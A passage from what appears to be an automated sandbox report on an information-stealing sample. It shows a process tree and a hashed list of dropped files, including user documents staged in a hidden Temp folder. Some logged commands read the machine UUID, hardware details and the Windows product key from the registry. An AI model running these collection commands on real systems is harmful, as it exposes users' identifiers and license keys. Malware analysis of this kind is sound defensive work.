                                                                              C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                                                              3⤵
                                                                                PID:4716
                                                                                • C:\Windows\System32\Wbem\WMIC.exe
                                                                                  wmic csproduct get uuid
                                                                                  4⤵
                                                                                    PID:2128
                                                                                • C:\Windows\system32\cmd.exe
                                                                                  C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
                                                                                  3⤵
                                                                                    PID:5044
                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                                                                                      4⤵
                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                      PID:1632
                                                                                  • C:\Windows\system32\cmd.exe
                                                                                    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                                                                                    3⤵
                                                                                      PID:2352
                                                                                      • C:\Windows\System32\Wbem\WMIC.exe
                                                                                        wmic path win32_VideoController get name
                                                                                        4⤵
                                                                                        • Detects videocard installed
                                                                                        PID:1960
                                                                                    • C:\Windows\system32\cmd.exe
                                                                                      C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
                                                                                      3⤵
                                                                                        PID:1648
                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
                                                                                          4⤵
                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                          PID:664

                                                                                  Network

                                                                                  MITRE ATT&CK Enterprise v15

                                                                                  Replay Monitor

                                                                                  Loading Replay Monitor...

                                                                                  Downloads

                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                                                                    Filesize

                                                                                    2KB

                                                                                    MD5

                                                                                    d85ba6ff808d9e5444a4b369f5bc2730

                                                                                    SHA1

                                                                                    31aa9d96590fff6981b315e0b391b575e4c0804a

                                                                                    SHA256

                                                                                    84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

                                                                                    SHA512

                                                                                    8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                    Filesize

                                                                                    944B

                                                                                    MD5

                                                                                    77d622bb1a5b250869a3238b9bc1402b

                                                                                    SHA1

                                                                                    d47f4003c2554b9dfc4c16f22460b331886b191b

                                                                                    SHA256

                                                                                    f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb

                                                                                    SHA512

                                                                                    d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9

                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                    Filesize

                                                                                    944B

                                                                                    MD5

                                                                                    65a68df1062af34622552c4f644a5708

                                                                                    SHA1

                                                                                    6f6ecf7b4b635abb0b132d95dac2759dc14b50af

                                                                                    SHA256

                                                                                    718dc2f5f4a6dbb7fab7f3db05bd7f602fb16526caae7084ab46c3ab4e7bad35

                                                                                    SHA512

                                                                                    4e460eb566032942547b58411222dd26ae300a95f83cf5ae6df58ebd28594341123611b348bd4031a33bc7f38307d5cb8fb677bba8c896919e3eee677a104d4d

                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                    Filesize

                                                                                    1KB

                                                                                    MD5

                                                                                    432de81edcd286c2561071c4ca13bc31

                                                                                    SHA1

                                                                                    120882122d4da6f6b89e8fd20ec55c39037f9194

                                                                                    SHA256

                                                                                    42dcd89a66ae289ff9e231fc0f0605d39f04e1692b6b99fbf9b856255d1c9176

                                                                                    SHA512

                                                                                    54e639de8116167645723b06c55ba439323fd1132a9e09d250361f696cba0be3d6fbbaec736a2bbbdcc0ebfea6e41cc62aee192daa00533d1dbb6d10ac2fd7a4

                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                    Filesize

                                                                                    1KB

                                                                                    MD5

                                                                                    276798eeb29a49dc6e199768bc9c2e71

                                                                                    SHA1

                                                                                    5fdc8ccb897ac2df7476fbb07517aca5b7a6205b

                                                                                    SHA256

                                                                                    cd0a1056e8f1b6cb5cb328532239d802f4e2aa8f8fcdc0fcb487684bd68e0dcc

                                                                                    SHA512

                                                                                    0d34fce64bbefc57d64fa6e03ca886952263d5f24df9c1c4cce6a1e8f5a47a9a21e9820f8d38caa7f7b43a52336ce00b738ea18419aaa7c788b72e04ce19e4f2

                                                                                  • C:\Users\Admin\AppData\Local\Temp\RESA23B.tmp

                                                                                    Filesize

                                                                                    1KB

                                                                                    MD5

                                                                                    a00c215bb63a554310467a9251390da4

                                                                                    SHA1

                                                                                    371eee4ffa102e08227c1c2d66a1bae619c2a98f

                                                                                    SHA256

                                                                                    74b4a7d190dfafddb1233425bce99a8fed31b6885c1da94f07bb3fadb6e6c9fc

                                                                                    SHA512

                                                                                    4694a5fba0a6f530ae2b22ca40db0c66a6b0b47e1f28b86e4b73bb52d44044078865fe120159c70de236d7ec3eaaa7f1457a759af4b827a1821c5dc83f4a57f6

                                                                                  • C:\Users\Admin\AppData\Local\Temp\_MEI20362\VCRUNTIME140.dll

                                                                                    Filesize

                                                                                    106KB

                                                                                    MD5

                                                                                    4585a96cc4eef6aafd5e27ea09147dc6

                                                                                    SHA1

                                                                                    489cfff1b19abbec98fda26ac8958005e88dd0cb

                                                                                    SHA256

                                                                                    a8f950b4357ec12cfccddc9094cca56a3d5244b95e09ea6e9a746489f2d58736

                                                                                    SHA512

                                                                                    d78260c66331fe3029d2cc1b41a5d002ec651f2e3bbf55076d65839b5e3c6297955afd4d9ab8951fbdc9f929dbc65eb18b14b59bce1f2994318564eb4920f286

                                                                                  • C:\Users\Admin\AppData\Local\Temp\_MEI20362\_bz2.pyd

                                                                                    Filesize

                                                                                    48KB

                                                                                    MD5

                                                                                    554b7b0d0daca993e22b7d31ed498bc2

                                                                                    SHA1

                                                                                    ea7f1823e782d08a99b437c665d86fa734fe3fe4

                                                                                    SHA256

                                                                                    1db14a217c5279c106b9d55f440ccf19f35ef3a580188353b734e3e39099b13f

                                                                                    SHA512

                                                                                    4b36097eddd2c1d69ac98c7e98eebe7bb11a5117249ad36a99883732f643e21ecf58e6bea33b70974d600563dc0b0a30bead98bafb72537f8374b3d67979e60a

                                                                                  • C:\Users\Admin\AppData\Local\Temp\_MEI20362\_ctypes.pyd

                                                                                    Filesize

                                                                                    58KB

                                                                                    MD5

                                                                                    d603c8bfe4cfc71fe5134d64be2e929b

                                                                                    SHA1

                                                                                    ff27ea58f4f5b11b7eaa1c8884eac658e2e9248b

                                                                                    SHA256

                                                                                    5ee40bcaab13fa9cf064ecae6fc0da6d236120c06fa41602893f1010efaa52fe

                                                                                    SHA512

                                                                                    fcc0dbfbe402300ae47e1cb2469d1f733a910d573328fe7990d69625e933988ecc21ab22f432945a78995129885f4a9392e1cee224d14e940338046f61abe361

                                                                                  • C:\Users\Admin\AppData\Local\Temp\_MEI20362\_decimal.pyd

                                                                                    Filesize

                                                                                    106KB

                                                                                    MD5

                                                                                    9cef71be6a40bc2387c383c217d158c7

                                                                                    SHA1

                                                                                    dd6bc79d69fc26e003d23b4e683e3fac21bc29cb

                                                                                    SHA256

                                                                                    677d9993bb887fef60f6657de6c239086ace7725c68853e7636e2ff4a8f0d009

                                                                                    SHA512

                                                                                    90e02054163d44d12c603debdc4213c5a862f609617d78dd29f7fd21a0bae82add4ceaf30024da681c2a65d08a8142c83eb81d8294f1284edfbeeb7d66c371c8

                                                                                  • C:\Users\Admin\AppData\Local\Temp\_MEI20362\_hashlib.pyd

                                                                                    Filesize

                                                                                    35KB

                                                                                    MD5

                                                                                    32df18692606ce984614c7efda2eec27

                                                                                    SHA1

                                                                                    86084e39ab0aadf0ecfb82ce066b7bf14152961e

                                                                                    SHA256

                                                                                    b7c9c540d54ab59c16936e1639c6565cd35a8ca625f31753e57db9cbd0ee0065

                                                                                    SHA512

                                                                                    679f8956370edc4dee32475d8440a2d2f9b6dd0edd0e033e49fed7834a35c7ed51ccde0995d19ed0a559a4383b99ae8c11e4e686902db12a2a5e0a3f2c0f4a9d

                                                                                  • C:\Users\Admin\AppData\Local\Temp\_MEI20362\_lzma.pyd

                                                                                    Filesize

                                                                                    85KB

                                                                                    MD5

                                                                                    01629284f906c40f480e80104158f31a

                                                                                    SHA1

                                                                                    6ab85c66956856710f32aed6cdae64a60aea5f0f

                                                                                    SHA256

                                                                                    a201ec286b0233644ae62c6e418588243a3f2a0c5a6f556e0d68b3c747020812

                                                                                    SHA512

                                                                                    107a4e857dd78dd92be32911e3a574f861f3425e01ab4b1a7580ac799dc76122ce3165465d24c34ac7fc8f2810547ad72b4d4ba3de76d3d61ed9bf5b92e7f7d4

                                                                                  • C:\Users\Admin\AppData\Local\Temp\_MEI20362\_queue.pyd

                                                                                    Filesize

                                                                                    25KB

                                                                                    MD5

                                                                                    4a313dc23f9d0a1f328c74dd5cf3b9ab

                                                                                    SHA1

                                                                                    494f1f5ead41d41d324c82721ab7ca1d1b72c062

                                                                                    SHA256

                                                                                    2163010bfde88a6cc15380516d31955935e243b7ad43558a89380bf5fe86337e

                                                                                    SHA512

                                                                                    42c712b758b35c0005b3528af586233298c2df4ed9f5133b8469bca9ec421ab151ce63f3929898c73d616cd9707594fa5f96d623fc150e214a4b2276c23c296e

                                                                                  • C:\Users\Admin\AppData\Local\Temp\_MEI20362\_socket.pyd

                                                                                    Filesize

                                                                                    43KB

                                                                                    MD5

                                                                                    67897f8c3262aecb8c9f15292dd1e1f0

                                                                                    SHA1

                                                                                    74f1ef77dd3265846a504f98f2e2f080eadbf58a

                                                                                    SHA256

                                                                                    ddbfa852e32e20d67a0c3d718ce68e9403c858d5cad44ea6404aff302556aba7

                                                                                    SHA512

                                                                                    200b6570db2fbb2eac7f51cae8e16ffb89cd46d13fba94a7729a675f10f4432fc89a256fd6bd804feac528191bd116407fd58a0573487d905fc8fca022c1abba

                                                                                  • C:\Users\Admin\AppData\Local\Temp\_MEI20362\_sqlite3.pyd

                                                                                    Filesize

                                                                                    56KB

                                                                                    MD5

                                                                                    230025cf18b0c20c5f4abba63d733ca8

                                                                                    SHA1

                                                                                    336248fde1973410a0746599e14485d068771e30

                                                                                    SHA256

                                                                                    30a3bc9ed8f36e3065b583d56503b81297f32b4744bff72dcf918407978ce332

                                                                                    SHA512

                                                                                    2c4d943c6587d28763cf7c21ad37cc4762674a75c643994b3e8e7c7b20576d5674cf700fdfaddc1a834d9bf034bf2f449d95351c236fde720505ccdd03369bb1

                                                                                  • C:\Users\Admin\AppData\Local\Temp\_MEI20362\_ssl.pyd

                                                                                    Filesize

                                                                                    62KB

                                                                                    MD5

                                                                                    0d15b2fdfa03be76917723686e77823c

                                                                                    SHA1

                                                                                    efd799a4a5e4f9d15226584dd2ee03956f37bdaf

                                                                                    SHA256

                                                                                    2fc63abe576c0d5fe031cf7ee0e2f11d9c510c6dbacfc5dd2e79e23da3650ee8

                                                                                    SHA512

                                                                                    e21ab5ebe8b97243cf32ca9181c311978e203852847e4beb5e6ada487038c37dec18a2b683e11e420e05ace014aca2172b2dda15930bab944053843e25623227

                                                                                  • C:\Users\Admin\AppData\Local\Temp\_MEI20362\base_library.zip

                                                                                    Filesize

                                                                                    1.4MB

                                                                                    MD5

                                                                                    70d2f26b1ebdc7e349d884669a9a7bd3

                                                                                    SHA1

                                                                                    146a4580cc02823ff58fd9ac4bad5b351f8bd0d9

                                                                                    SHA256

                                                                                    9cb34abc6a4bb0e65d7923449fb75477f39f26e2db64ff3917ee5d731768667c

                                                                                    SHA512

                                                                                    087e28456f77a4171f6e51116bee1042ccf49832fb31d806d2340ba9daf662dec8faffdcff2ac8f6657f7eee00ae23f562165769fbc704f2c24cc7e2a7c53cb6

                                                                                  • C:\Users\Admin\AppData\Local\Temp\_MEI20362\blank.aes

                                                                                    Filesize

                                                                                    119KB

                                                                                    MD5

                                                                                    61b09e3950921b3b41773bd499a240ea

                                                                                    SHA1

                                                                                    25909f317bb114fdee8eccd3060c6a775c46f6c7

                                                                                    SHA256

                                                                                    fd21a244ac4fa63f31e2ff6c2b9884a0ed320f55b743d0af11027251db9b5f34

                                                                                    SHA512

                                                                                    ea4e2ee28272bce65ee1df004f7496aba0e6e5ddbce3e5179d272919e33cccc386fb3ef5070419bc7552c72e457a45efbed465cad35c1daf3170f18189b3e6db

                                                                                  • C:\Users\Admin\AppData\Local\Temp\_MEI20362\libcrypto-1_1.dll

                                                                                    Filesize

                                                                                    1.1MB

                                                                                    MD5

                                                                                    bbc1fcb5792f226c82e3e958948cb3c3

                                                                                    SHA1

                                                                                    4d25857bcf0651d90725d4fb8db03ccada6540c3

                                                                                    SHA256

                                                                                    9a36e09f111687e6b450937bb9c8aede7c37d598b1cccc1293eed2342d11cf47

                                                                                    SHA512

                                                                                    3137be91f3393df2d56a3255281db7d4a4dccd6850eeb4f0df69d4c8dda625b85d5634fce49b195f3cc431e2245b8e9ba401baaa08778a467639ee4c1cc23d8d

                                                                                  • C:\Users\Admin\AppData\Local\Temp\_MEI20362\libffi-8.dll

                                                                                    Filesize

                                                                                    29KB

                                                                                    MD5

                                                                                    08b000c3d990bc018fcb91a1e175e06e

                                                                                    SHA1

                                                                                    bd0ce09bb3414d11c91316113c2becfff0862d0d

                                                                                    SHA256

                                                                                    135c772b42ba6353757a4d076ce03dbf792456143b42d25a62066da46144fece

                                                                                    SHA512

                                                                                    8820d297aeda5a5ebe1306e7664f7a95421751db60d71dc20da251bcdfdc73f3fd0b22546bd62e62d7aa44dfe702e4032fe78802fb16ee6c2583d65abc891cbf

                                                                                  • C:\Users\Admin\AppData\Local\Temp\_MEI20362\libssl-1_1.dll

                                                                                    Filesize

                                                                                    204KB

                                                                                    MD5

                                                                                    ad0a2b4286a43a0ef05f452667e656db

                                                                                    SHA1

                                                                                    a8835ca75768b5756aa2445ca33b16e18ceacb77

                                                                                    SHA256

                                                                                    2af3d965863018c66c2a9a2d66072fe3657bbd0b900473b9bbdcac8091686ae1

                                                                                    SHA512

                                                                                    cceb5ec1dd6d2801abbacd6112393fecbf5d88fe52db86cfc98f13326c3d3e31c042b0cc180b640d0f33681bdd9e6a355dc0fbfde597a323c8d9e88de40b37c4

                                                                                  • C:\Users\Admin\AppData\Local\Temp\_MEI20362\python311.dll

                                                                                    Filesize

                                                                                    1.6MB

                                                                                    MD5

                                                                                    9e985651962ccbccdf5220f6617b444f

                                                                                    SHA1

                                                                                    9238853fe1cff8a49c2c801644d6aa57ed1fe4d2

                                                                                    SHA256

                                                                                    3373ee171db8898c83711ec5067895426421c44f1be29af96efe00c48555472e

                                                                                    SHA512

                                                                                    8b8e68bbe71dcd928dbe380fe1a839538e7b8747733ba2fd3d421ba8d280a11ba111b7e8322c14214d5986af9c52ab0c75288bbb2a8b55612fb45836c56ddc36

                                                                                  • C:\Users\Admin\AppData\Local\Temp\_MEI20362\rar.exe

                                                                                    Filesize

                                                                                    615KB

                                                                                    MD5

                                                                                    9c223575ae5b9544bc3d69ac6364f75e

                                                                                    SHA1

                                                                                    8a1cb5ee02c742e937febc57609ac312247ba386

                                                                                    SHA256

                                                                                    90341ac8dcc9ec5f9efe89945a381eb701fe15c3196f594d9d9f0f67b4fc2213

                                                                                    SHA512

                                                                                    57663e2c07b56024aaae07515ee3a56b2f5068ebb2f2dc42be95d1224376c2458da21c965aab6ae54de780cb874c2fc9de83d9089abf4536de0f50faca582d09

                                                                                  • C:\Users\Admin\AppData\Local\Temp\_MEI20362\rarreg.key

                                                                                    Filesize

                                                                                    456B

                                                                                    MD5

                                                                                    4531984cad7dacf24c086830068c4abe

                                                                                    SHA1

                                                                                    fa7c8c46677af01a83cf652ef30ba39b2aae14c3

                                                                                    SHA256

                                                                                    58209c8ab4191e834ffe2ecd003fd7a830d3650f0fd1355a74eb8a47c61d4211

                                                                                    SHA512

                                                                                    00056f471945d838ef2ce56d51c32967879fe54fcbf93a237ed85a98e27c5c8d2a39bc815b41c15caace2071edd0239d775a31d1794dc4dba49e7ecff1555122

                                                                                  • C:\Users\Admin\AppData\Local\Temp\_MEI20362\select.pyd

                                                                                    Filesize

                                                                                    25KB

                                                                                    MD5

                                                                                    27703f9a7c7e90e049d5542fb7746988

                                                                                    SHA1

                                                                                    bc9c6f5271def4cc4e9436efa00f231707c01a55

                                                                                    SHA256

                                                                                    fcc744cfccc1c47f6f918e66cfc1b73370d2cecdb776984fabb638745ebe3a38

                                                                                    SHA512

                                                                                    0875ad48842bbac73e59d4b0b5d7083280bde98336c8856160493cc63f7c3a419f4471f19c8537e5c8515e194c6604f9efa07d9d9af5def2f374406d316436a8

                                                                                  • C:\Users\Admin\AppData\Local\Temp\_MEI20362\sqlite3.dll

                                                                                    Filesize

                                                                                    610KB

                                                                                    MD5

                                                                                    08ce33649d6822ff0776ede46cc65650

                                                                                    SHA1

                                                                                    941535dabdb62c7ca74c32f791d2f4b263ec7d48

                                                                                    SHA256

                                                                                    48f50e8a693f3b1271949d849b9a70c76acaa4c291608d869efe77de1432d595

                                                                                    SHA512

                                                                                    8398e54645093e3f169c0b128cbeda3799d905173c9cb9548962ecbaf3d305620f0316c7c3f27077b148b8f6d3f6146b81c53b235f04ac54668dab05b929d52f

                                                                                  • C:\Users\Admin\AppData\Local\Temp\_MEI20362\unicodedata.pyd

                                                                                    Filesize

                                                                                    295KB

                                                                                    MD5

                                                                                    f86f9b7eb2cb16fb815bb0650d9ef452

                                                                                    SHA1

                                                                                    b9e217146eb6194fc38923af5208119286c365ad

                                                                                    SHA256

                                                                                    b37d56ad48a70b802fb337d721120d753270dbda0854b1bfb600893fb2ce4e7a

                                                                                    SHA512

                                                                                    6c448f6d6c069ba950c555529557f678dfd17c748b2279d5eec530d7eb5db193aa1ca18dd3ce9f5220e8681a0e50b00d7de93c6744476c0e1872dafd9d5de775

                                                                                  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_wxpqbexr.i25.ps1

                                                                                    Filesize

                                                                                    60B

                                                                                    MD5

                                                                                    d17fe0a3f47be24a6453e9ef58c94641

                                                                                    SHA1

                                                                                    6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                    SHA256

                                                                                    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                    SHA512

                                                                                    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                                  • C:\Users\Admin\AppData\Local\Temp\gcbxn1e3\gcbxn1e3.dll

                                                                                    Filesize

                                                                                    4KB

                                                                                    MD5

                                                                                    d50ee91ad48e2bafb16c271c1bee4bea

                                                                                    SHA1

                                                                                    58c862e1e3ef6aaaa7fb01a51a52dbf9f52cc7fd

                                                                                    SHA256

                                                                                    b1025f6c346d868e162433a4706cff153a8a6d308b1ff0133f567d65d532459a

                                                                                    SHA512

                                                                                    f353e205d29b2c3a01ec4dc87590fcb2604be0e6aa3183204c85cf2d517b65a5043afa1f08d3da64a91161fb77ab6b8f9d5a4bc0c90c06f8fed6bd32c8043f96

                                                                                  • C:\Users\Admin\AppData\Local\Temp\     ‍​  ‏\Common Files\Desktop\DenyStart.xlsx

                                                                                    Filesize

                                                                                    12KB

                                                                                    MD5

                                                                                    24db415271c14e8ba63e917a25a2ce3f

                                                                                    SHA1

                                                                                    bf50a6f530dc0e1cc9e43f93f17339036e65ba89

                                                                                    SHA256

                                                                                    9d9ab5652c37075c093a9aa9a454a70e1d9eba9a9f570fab21ed537cd3468b7d

                                                                                    SHA512

                                                                                    ef17d0966c7ddb514929014fa59f769e8686cda911f5789c49e9b2314a3972a2d7eaa8a42a0f0136896791c9a6e3f45a69a7f253b99dd4e38d06f3631fffd326

                                                                                  • C:\Users\Admin\AppData\Local\Temp\     ‍​  ‏\Common Files\Desktop\ResolveDisable.docx

                                                                                    Filesize

                                                                                    21KB

                                                                                    MD5

                                                                                    24a6b092004ece5347847a7f98d5424c

                                                                                    SHA1

                                                                                    e08e3317a4c4520d2aadc64d3296f452c739379e

                                                                                    SHA256

                                                                                    211432213456a38cb55af7017e5e64777c513f7d51e0849915974e689aeb754e

                                                                                    SHA512

                                                                                    23317b62b3150102c09b8de11626f5d90684282fc1a3a8d3df2c1da6a2c50fa42efe98a282af1cbb0ff8fb191c2bebaac0dcdfc8fdbedc6000b4fc5b50755a0a

                                                                                  • C:\Users\Admin\AppData\Local\Temp\     ‍​  ‏\Common Files\Documents\ConvertEnable.doc

                                                                                    Filesize

                                                                                    1.9MB

                                                                                    MD5

                                                                                    562a218c7f71a73251b394ca746d238a

                                                                                    SHA1

                                                                                    e523ec99a8e3b4a6ced3fbbe6bc38b003d9aaf00

                                                                                    SHA256

                                                                                    9a47737b71d18262e55b066588d13f3c1e6eea6c48caf7c3e1e72ba8889e00c8

                                                                                    SHA512

                                                                                    146b3f7bc38579dc2e304b482e7e14936d077394342eefd473fdae595ed7cc5672c75ab9903d8224d55d0ac8d42f7fa416068dd0c26ef33be49fcf6a4e23f8d3

                                                                                  • C:\Users\Admin\AppData\Local\Temp\     ‍​  ‏\Common Files\Documents\CopyRename.docx

                                                                                    Filesize

                                                                                    13KB

                                                                                    MD5

                                                                                    f5c5f52a1e7b2fdc9de770136634dd10

                                                                                    SHA1

                                                                                    b4bde8d916b4899a51caea1ab80c1ccb8a2d2751

                                                                                    SHA256

                                                                                    7d95df5f736025e83a37cb2507cdc2d741621f249cf38f2c3248ad2a943bd258

                                                                                    SHA512

                                                                                    77321010619df7b0e878156cf7c725882f89d39e4d714b4575629d07257493676d6db34d836f494b5a43eceeba23fbbd3a3d054ceee4d9ee1083052d82331de8

                                                                                  • C:\Users\Admin\AppData\Local\Temp\     ‍​  ‏\Common Files\Documents\GetMeasure.docx

                                                                                    Filesize

                                                                                    1.1MB

                                                                                    MD5

                                                                                    3a89948ef3a00accb2df72f51498de21

                                                                                    SHA1

                                                                                    7454b427b6351b44a22f0e45f564273eb2fdaeb9

                                                                                    SHA256

                                                                                    7b9f839248621cd430fedac1a5f566f5c46b9211949daefaf66882085942f830

                                                                                    SHA512

                                                                                    4a3a28c5a60e6b065d12205afa751cd05c0c2aa951470262e3d6279cd4bd17635b1c0b63d4597294ae412a355f23e0fd28265e57c44c58301b4a0852df9a9954

                                                                                  • C:\Users\Admin\AppData\Local\Temp\     ‍​  ‏\Common Files\Documents\PublishUnblock.xlsx

                                                                                    Filesize

                                                                                    12KB

                                                                                    MD5

                                                                                    43b3eb5dbb559476fe82ed1fe7a448c0

                                                                                    SHA1

                                                                                    5b7c98459cfb3a7b2c3676b432d5444787362fc3

                                                                                    SHA256

                                                                                    991db4cc5078747c4ec379127e9bae8e0926afad568ef9baf65f4994dadbe258

                                                                                    SHA512

                                                                                    7e181ce431a22b5d103d2d8e494d9df7c091e511f1d4297143c502d2e4cc8fc053c016f946e998ed856b3cd18f06f595a15f214385576658e9c50ebdb2ca9626

                                                                                  • C:\Users\Admin\AppData\Local\Temp\     ‍​  ‏\Common Files\Documents\RestartUnblock.pdf

                                                                                    Filesize

                                                                                    936KB

                                                                                    MD5

                                                                                    8f43d45e4eeb40d90bb888c23000069a

                                                                                    SHA1

                                                                                    81379edf841b5d5a89910e9cbd6c97a137308aa6

                                                                                    SHA256

                                                                                    e9e168496bc632c06e84fa53257e9d7c07f060eefa75c4c95bff647ea4914200

                                                                                    SHA512

                                                                                    3b57936bbd4b6561e1b57adf8adb14fcecc8ac6a7b5a81eca21b7415d85921315a1907319dd58b705ec6d28021720cb2ea943d3af4f3d03c56a7a6d719b260ca

                                                                                  • C:\Users\Admin\AppData\Local\Temp\     ‍​  ‏\Common Files\Documents\SendExport.xlsx

                                                                                    Filesize

                                                                                    12KB

                                                                                    MD5

                                                                                    399e77952c03008f28e86af016bc4673

                                                                                    SHA1

                                                                                    b8f7ce417c42c5e0fd75cf5624f5a872aa05f558

                                                                                    SHA256

                                                                                    98aa50b6d6caa4c1a097e76e28432b49371f7280acc8edead677304b1229b144

                                                                                    SHA512

                                                                                    c974b996f6310aeeafd0c0f2735efb285a63b1ee34ee6c29b37e1a6efc57647208cd0b4747300fca2c15deeae3d3b73ab93059076221f78930a7ca1e74d34802

                                                                                  • C:\Users\Admin\AppData\Local\Temp\     ‍​  ‏\Common Files\Downloads\ReadPing.mp3

                                                                                    Filesize

                                                                                    783KB

                                                                                    MD5

                                                                                    9fc7a3856c9f0d0ca16472cb967d1a76

                                                                                    SHA1

                                                                                    354d4f7544cb989cbf5a7adbbfb3925509546807

                                                                                    SHA256

                                                                                    418c5ca31310a0146ec1870b8d17ab714553cc5a34bb117ba0a2e4eed72239ab

                                                                                    SHA512

                                                                                    d9850b4a80c937a4805f95c77d009471518f806cf1f63ad10f33574a8e744e1c9072dfadae57bd6c77de90e0dc93d8aa035fdba0c6778f28bc5c28bb11f3b8f2

                                                                                  • C:\Users\Admin\AppData\Local\Temp\     ‍​  ‏\Common Files\Music\CopyWatch.mp3

                                                                                    Filesize

                                                                                    139KB

                                                                                    MD5

                                                                                    66b8d58673c314e3d8775d9719867327

                                                                                    SHA1

                                                                                    a78a718875d4be7c149ec45818e18aa755f81501

                                                                                    SHA256

                                                                                    cfa1f8046dab4bfc143b18f855e6003fdcdca18365ad181bd38a4519d2b75dc6

                                                                                    SHA512

                                                                                    dd56cc1d78653b5a6a46238eaea3b04fc66805cd9ca316d986fad9b701a5d3ff2aabb21adbea67890741b7f8b94d7119e417f21b2ca513a4bd0abaa5ae9f9e8a

                                                                                  • C:\Users\Admin\AppData\Local\Temp\     ‍​  ‏\Common Files\Music\EnableTest.csv

                                                                                    Filesize

                                                                                    241KB

                                                                                    MD5

                                                                                    ad65471ca09b9c0503f23c1651883bbc

                                                                                    SHA1

                                                                                    d424130168826d7a75179586026b2ed373ed21d5

                                                                                    SHA256

                                                                                    6bf5f4bba14a06e59c5454ac07817436796308b97a15b90ce992ba5b065a0229

                                                                                    SHA512

                                                                                    8a50622530ac0073c0a46c87a98b84d82f91785ccd52fa93c8ee47216196d00fb9084341da5857a1d5366df67c8b3603e4c91e510c9508531176e1967d2f32d4

                                                                                  • C:\Users\Admin\AppData\Local\Temp\     ‍​  ‏\Common Files\Music\ExportSet.xls

                                                                                    Filesize

                                                                                    291KB

                                                                                    MD5

                                                                                    50b4ed49219ba4259c0dd786999cd6f3

                                                                                    SHA1

                                                                                    63b920d2a2a37719b7a24ece7661fa3881aefee9

                                                                                    SHA256

                                                                                    ef03a01c9eee0e55ef6087118485203b401a8a120057a72ec248c9e979bceec5

                                                                                    SHA512

                                                                                    ac2386eb9deddb63b6e9069c3cb0049b00be0bc2428828a1edee3a55f5db46b203a22cab001cbf1399ea33ebef338fdb7fb0a96d6758f2dd57f967ee129e0b89

                                                                                  • C:\Windows\System32\drivers\etc\hosts

                                                                                    Filesize

                                                                                    2KB

                                                                                    MD5

                                                                                    f99e42cdd8b2f9f1a3c062fe9cf6e131

                                                                                    SHA1

                                                                                    e32bdcab8da0e3cdafb6e3876763cee002ab7307

                                                                                    SHA256

                                                                                    a040d43136f2f4c41a4875f895060fb910267f2ffad2e3b1991b15c92f53e0f0

                                                                                    SHA512

                                                                                    c55a5e440326c59099615b21d0948cdc2a42bd9cf5990ec88f69187fa540d8c2e91aebe6a25ed8359a47be29d42357fec4bd987ca7fae0f1a6b6db18e1c320a6

                                                                                  • \??\c:\Users\Admin\AppData\Local\Temp\gcbxn1e3\CSC1831CB5A96454243BAA885990BBFB86.TMP

                                                                                    Filesize

                                                                                    652B

                                                                                    MD5

                                                                                    55fbe3757791e24672b3b38e9c7e32e8

                                                                                    SHA1

                                                                                    795d0c818b5fbc7bd77c375a8ad5413c84d8a662

                                                                                    SHA256

                                                                                    b965e3ed8f77ba07eadd6b477ca9097ca2bcfd6813042a9754138b751d67716a

                                                                                    SHA512

                                                                                    064cc3eb67ffd8dfca199d018fe28d68522e867964ef3a28824611a529cae7b8efe5d37f126c5c8b08a7d2185e0e84087fbb6e76867e34f8ec8a3ea4d97092d6

                                                                                  • \??\c:\Users\Admin\AppData\Local\Temp\gcbxn1e3\gcbxn1e3.0.cs

                                                                                    Filesize

                                                                                    1004B

                                                                                    MD5

                                                                                    c76055a0388b713a1eabe16130684dc3

                                                                                    SHA1

                                                                                    ee11e84cf41d8a43340f7102e17660072906c402

                                                                                    SHA256

                                                                                    8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7

                                                                                    SHA512

                                                                                    22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

                                                                                  • \??\c:\Users\Admin\AppData\Local\Temp\gcbxn1e3\gcbxn1e3.cmdline

                                                                                    Filesize

                                                                                    607B

                                                                                    MD5

                                                                                    e6b60d0920729378ca82d9616b04be25

                                                                                    SHA1

